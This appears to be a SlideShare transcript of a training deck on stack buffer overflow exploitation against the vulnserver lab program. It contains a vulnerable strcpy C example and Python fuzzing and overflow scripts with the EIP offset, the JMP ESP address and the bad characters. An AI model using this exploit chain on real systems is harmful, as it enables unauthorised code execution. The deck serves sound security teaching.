Exploiting buffer overflows
Download as ODP, PDF3 likes3,754 views
This document discusses conducting a buffer overflow attack against a vulnerable program. It describes the stack structure and how overflowing a buffer can overwrite the instruction pointer to redirect execution. Specifically, it shows finding the offset to overwrite the EIP, locating a "JMP ESP" instruction to redirect execution, adding shellcode, and dealing with bad characters. The final buffer structure pushes shellcode onto the stack and redirects to it to execute the attack. However, it notes these attacks should only be tested with explicit permission.
![A Vulnerable 'C' program
#include<stdio.h>
int main(int argc, char *argv[])
{
char buff[20];
printf("copying into buffer");
strcpy(buff,argv[1]);
return 0;
}
We defined a character
of size 20 bytes, it
reserves some space on
the stack
We copy the buffer using
string copy without
checking it's size
If we pass more then the buffer size (20 bytes) we get a buffer
overflow !!!](https://image.slidesharecdn.com/exploitingbuffer-overflows-150214081610-conversion-gate01/85/Exploiting-buffer-overflows-8-320.jpg)
Ad
More Related Content
What's hot (20)
Similar to Exploiting buffer overflows (20)
Ad
More from Paul Dutot IEng MIET MBCS CITP OSCP CSTM (10)
Ad
Recently uploaded (20)
Exploiting buffer overflows
- 2. Disclaimer @cyberkryption The views expressed within this presentation or afterwards are my own and in no way represent my employer. The following presentation describes how to conduct a buffer overflow attack. These attacks are illegal to perform against systems that you do not have explicit permission to test. I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations. Caveat: With knowledge comes responsibility
- 4. Who is This?
- 5. Von Neuman Explained.. Extract from Engineer's minute at www.youtube.com/watch?v=5BpgAHBZgec
- 6. Phrack 49
- 7. Meet the Stack Each program has it's own stack as a memory structure. Program data such as variable are also saved Data is 'pushed' on to the stack and 'popped' off the stack https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
- 8. A Vulnerable 'C' program #include<stdio.h> int main(int argc, char *argv[]) { char buff[20]; printf("copying into buffer"); strcpy(buff,argv[1]); return 0; } We defined a character of size 20 bytes, it reserves some space on the stack We copy the buffer using string copy without checking it's size If we pass more then the buffer size (20 bytes) we get a buffer overflow !!!
- 9. Stack Overwrite Data on the stack is overwritten. Extra input overwrites other data in the stack Eventually the instruction pointer is overwritten and we have control!!! https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
- 10. Meet the CPU Registers & Pointers CPU Pointers EIP = Points to the next address in memory to be executed ESP = Stack Pointer. EBP = Stack Pointer Base Pointer If we can overwrite EIP we can control execution flow other wise it's a DOS exploit. CPU Registers EAX Accumulator EBX Base Register ECX Counter Register EDX Data Register
- 11. Meet vulnserver
- 12. Initial Fuzzing #!/usr/bin/python import socket server = '192.168.1.65' port = 9999 length = int(raw_input('Length of attack: ')) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending attack length ", length, ' to TRUN .' attack = 'A' * length s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
- 13. Initial Fuzzing - Video
- 14. Initial Crash - Video
- 15. Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer ???????? ???????? ????????
- 16. EIP Hunting #!/usr/bin/python import socket server = '192.168.1.65' port = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN ." attack = " < insert cyclic pattern here> " s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
- 17. EIP Hunting – Cyclic Pattern Crash
- 18. How to Locate EIP Overwrite ● After crash with cyclic pattern, we find characters of 396F4348 overwriting the EIP register ● Metasploit pattern_create.rb to create a cyclic pattern of 3000 non repeating characters. ● Lastly use pattern offset to find EIP overwrite ● Use convert.sh for HEX to ASCII conversion
- 19. Locating EIP Offset - Video
- 20. EIP Hunting Part II #!/usr/bin/python import socket server = '192.168.1.65' sport = 9999 prefix = 'A' * 2006 eip = 'BBBB' padding = 'F' * (3000 - 2006 - 4) attack = prefix + eip + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, sport)) print s.recv(1024) print "Sending Buffer to TRUN " s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
- 21. EIP & Buffer Space Confirmed Buffer Space = 023AFAEB - 023AF9E0 = 980 Bytes
- 22. Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 + 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction ???????? ????????
- 23. Determining JMP ESP Memory Location
- 24. Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 + 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction 625011AF in essfunc.dll ????????
- 25. The Bad Character Problem Hex Dec Description --- --- --------------------------------------------- 0x00 0 Null byte, terminates a C string 0x0A 10 Line feed, may terminate a command line 0x0D 13 Carriage return, may terminate a command line 0x20 32 Space, may terminate a command line argument Bad Characters break our code when executed on the stack, for example 0x00 will stop our code executing!!
- 28. Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction 625011AF in essfunc.dll 0x00
- 29. Lets Create some Shellcode
- 30. Final Buffer Structure & Operation 625011AF EIP Overwite'A' * 2006 ShellcodeNOP Sled JMP ESP Buffer Overflow starts here Execution to 625011AF JMP ESP in 625011AF redirects to NOP SLED Shellcode Runs xCC Breakpoint Breakpoint Activated
- 31. Putting it all together
- 34. Questions ???? TWITTER: @cyberkryption BLOG: cyberkryption.wordpress.com